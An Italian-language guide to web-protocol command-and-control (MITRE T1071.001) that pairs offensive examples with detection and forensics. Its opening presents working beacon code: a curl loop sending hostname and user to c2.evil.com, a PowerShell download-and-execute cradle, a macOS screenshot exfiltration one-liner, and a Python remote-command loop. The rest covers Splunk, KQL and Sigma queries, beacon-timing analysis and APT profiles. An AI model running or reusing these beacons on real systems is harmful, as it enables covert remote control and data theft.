Protocolli Web: Application Layer Protocol - Web Protocols (T1071.001)

Iniziamo con un beacon HTTP minimalista che simula il comportamento di Carbanak. Su Linux, create un semplice C2 client che comunica ogni 60 secondi:

while true; do 
  curl -s -X POST https://c2.evil.com/beacon \
    -H "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0)" \
    -d "id=$(hostname)&data=$(whoami | base64)" \
    --proxy http://corporate-proxy:8080
  sleep 60
done

Per Windows, PowerShell offre capacità native devastanti. Questo one-liner scarica ed esegue payload mascherandosi da Internet Explorer:

$wc = New-Object System.Net.WebClient; 
$wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"); 
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; 
IEX $wc.DownloadString('https://pastebin.com/raw/malicious')

Su macOS, sfruttiamo AppleScript per comunicazioni stealth. Questo script invia screenshot ogni 5 minuti mascherandosi da Safari:

osascript -e 'do shell script "screencapture -x /tmp/screen.png && curl -F file=@/tmp/screen.png https://c2.evil.com/upload -A \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15\""'

Per ambienti containerizzati, Python con requests emula perfettamente traffico legittimo:

import requests, json, time, subprocess
while True:
    cmd = requests.get('https://c2.evil.com/tasks', 
                      headers={'X-API-Key': 'legit-looking-token'}).text
    result = subprocess.check_output(cmd, shell=True)
    requests.post('https://c2.evil.com/results', 
                 json={'output': result.decode(), 'host': socket.gethostname()})
    time.sleep(300)

CHOPSTICK di APT28 utilizzava certificati SSL pinned per evitare ispezione. Replicate questo comportamento verificando fingerprint specifici prima di comunicare. WebSocket offre persistenza superiore - stabilite tunnel bidirezionali che sopravvivono a proxy restrittivi utilizzando socket.io o implementazioni native.

Il rilevamento inizia identificando anomalie comportamentali, non signature statiche. Monitorate processi non-browser che generano traffico HTTP/S. In Splunk:

index=endpoint process_name!=chrome.exe process_name!=firefox.exe process_name!=safari 
| join type=inner host [search index=proxy dest_port IN (80,443)]
| stats count by process_name, dest_ip
| where count > 100

Cercate user-agent sospetti o mancanti. I beacon legittimi raramente omettono questo header:

NetworkSession
| where UserAgent == "" or UserAgent matches regex @"^(curl|wget|python)"
| summarize count() by ClientIP, UserAgent, RemoteIP
| where count_ > 10

L'entropia dei domini è cruciale. Domini DGA (Domain Generation Algorithm) mostrano pattern distintivi:

detection:
  selection:
    EventID: 22
    QueryName|re: '^[a-z0-9]{16,}\.(tk|ml|ga|cf)$'
  condition: selection

Analizzate periodicità delle connessioni. Cobalt Strike defaulta a 60 secondi di jitter. Questo script Python identifica beacon regolari:

from collections import defaultdict
import statistics

connections = defaultdict(list)
for log in parse_proxy_logs():
    key = (log.src_ip, log.dest_domain)
    connections[key].append(log.timestamp)

for (src, dest), timestamps in connections.items():
    intervals = [timestamps[i+1] - timestamps[i] for i in range(len(timestamps)-1)]
    if len(intervals) > 10 and statistics.stdev(intervals) < 5:
        print(f"Potential beacon: {src} -> {dest}")

Implementate analisi del contenuto. Payload Base64 in parametri GET/POST sono red flag immediate. Certificate pinning anomalo indica sofisticazione avanzata - correlate con threat intelligence su certificati noti malevoli.

L'investigazione post-breach richiede correlazione multi-sorgente. Su Windows, iniziate dal WebCache:

# Estrai URL visitati da Edge/IE
.\ESEDatabaseView.exe /table WebCacheV01.dat:Containers

I proxy log sono gold mine forensi. Cercate burst di attività notturna:

grep -E "0[2-5]:[0-9]{2}:[0-9]{2}" proxy.log | \
awk '{print $1, $7}' | sort | uniq -c | sort -rn | head -20

Memory forensics rivela C2 attivi. Volatility identifica connessioni sospette:

vol.py -f memory.dmp --profile=Win10x64 netscan | \
grep -E ":443|:80" | grep ESTABLISHED

Su sistemi Linux, /var/log/apache2/access.log cattura reverse shell PHP:

grep -E "POST.*\.(php|jsp|aspx)" access.log | \
grep -v "Mozilla\|Chrome\|Safari" | \
awk '{print $1, $7, $9}'

Per timeline accurate, correlate:

• DNS query logs (EventID 22 Sysmon)
• Proxy timestamps
• Process creation (EventID 1)
• Network connections (EventID 3)

Caso SolarWinds: gli analisti ricostruirono mesi di esfiltrazione correlando HTTPS POST di grandi dimensioni con processi solarwinds.businesslayerhost.exe anomali. La periodicità delle comunicazioni (ogni 60-90 minuti) e i domini DGA permisero di identificare l'intera infrastruttura C2.

Certificate transparency logs rivelano infrastrutture pre-posizionate. Cercate certificati Let's Encrypt emessi per domini simil-aziendali giorni prima dell'attacco.

APT29 (Cozy Bear) preferisce HTTPS con jitter randomizzato tra 45-90 minuti. User-agent ruotano tra versioni obsolete di Chrome/Firefox. Domini utilizzano typosquatting di servizi cloud legittimi (microsoftcloudupdate[.]com). Infrastructure hosted su VPS Europei con reverse proxy multipli.

Lazarus Group implementa WebSocket per persistenza. Certificati SSL auto-firmati con CN contenenti stringhe Unicode. Comunicazioni utilizzano steganografia in immagini PNG caricate su servizi legittimi. Post-compromise, migrano rapidamente a backup C2 su Tor.

Gamaredon Group abusa pesantemente di servizi cloud gratuiti - GitHub Gists per staging, Discord webhooks per notifiche. HTTP headers contengono comandi in campi custom (X-Session-Token). Preferenza per hosting Russo con domini .ru/.su registrati con dati falsi.

FIN8 monetizza accessi vendendo C2-as-a-Service. HTTPS su porta 8443/8080, certificati Comodo/DigiCert clonati. User-agent Android/iOS per blend con BYOD. Payload PowerShell Base64 in cookie __VIEWSTATE.

Turla rappresenta l'apice della sofisticazione. Satellite-based C2 come backup, HTTPS primario su CDN legittime (Cloudflare/Akamai). Comunicazioni steganografate in JavaScript comments di siti compromessi. Snake/Uroburos modula protocolli basandosi su DPI detection.

Pattern emergenti includono abuso di servizi "dual-use" - Slack API, Microsoft Teams webhooks, Notion databases. Correlate registrazioni domini con eventi geopolitici per anticipare campagne. Monitorate paste sites per leak di nuovi C2 panels.

Framework MITRE ATT&CK - T1071.001 Application Layer Protocol: Web Protocols. Documentazione dettagliata su 56 gruppi APT e relative TTP. CrowdStrike Putter Panda report per patterns HTTP in campagne Cina-attributed. Brazking-Websockets analysis su abuso WebSocket in ransomware moderni. Statistiche dwell time da Mandiant M-Trends 2024.